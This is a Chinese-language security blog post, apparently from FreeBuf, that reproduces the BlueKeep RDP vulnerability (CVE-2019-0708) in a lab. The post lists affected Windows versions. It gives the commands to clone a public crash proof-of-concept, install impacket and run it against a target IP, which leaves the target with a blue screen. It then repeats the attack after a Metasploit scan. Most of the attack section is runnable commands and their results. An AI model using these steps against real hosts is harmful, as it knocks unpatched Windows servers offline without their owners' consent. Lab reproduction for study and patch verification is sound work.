CVE-2019-0708 漏洞利用复现
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
收藏一下~
可以收录到专辑噢~
CVE-2019-0708 漏洞利用复现
HW期间,为防范钓鱼,即日起FreeBuf将取消投稿文章的一切外部链接。给您带来的不便,敬请谅解~
0x00漏洞概述
Windows系列服务器于2019年5月15号,被爆出高危漏洞,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的,堪比WannaCry(蠕虫病毒)。
0x01影响版本
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows Server 2003
Windows XP
0x02漏洞复现
为了顺利利用成功,靶机需要开启3389端口,防火墙也要关闭状态
1.poc下载:
CVE-2019-0708-POC GitHub:
git clone https://github.com/n1xbyte/cve-2019-0708 cd CVE-2019-0708
2.安装所需要的库(因为我的kali系统已经安装了这个库,这里就不截图展示)
pip3 install impacket
3.执行POC开始攻击
python3 crashpoc.py 192.168.88.150 64 #ip地址 系统版本
然后我们发现目标系统已蓝屏,说明我们攻击成功
--------------------------------------------------华丽丽的分割线-----------------------------------------------
使用MSF复现漏洞
优先下载POC到根目录下
git clone https://github.com/n1xbyte/cve-2019-0708
cd cve-2019-0708
启动msf
service postgresql start msfdb init msfconsole
搜索CVE-2019-0708相关漏洞利用模块
search 0708
我们先使用这个辅助模块0
use 0
然后我们设置一下RHOSTS
set rhosts 192.168.88.150
然后我们run以下,开始检测
run
结果显示这里存在这个漏洞
那么接下来我们就利用我们下载的POC进行攻击尝试
python3 crashpoc.py 192.168.88.150 64
然后我们发现攻击成功,系统再一次蓝屏
至此,这个漏洞的复现已经完成
本文为 FreeBuf_361913 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏

相关推荐
Apache log4j2-RCE 漏洞复现(CVE-2021-44228)
2021-12-14
74cms-v6.0.4-反射型XSS漏洞复现
2021-08-12
域传送漏洞浅析
2021-05-30
文章目录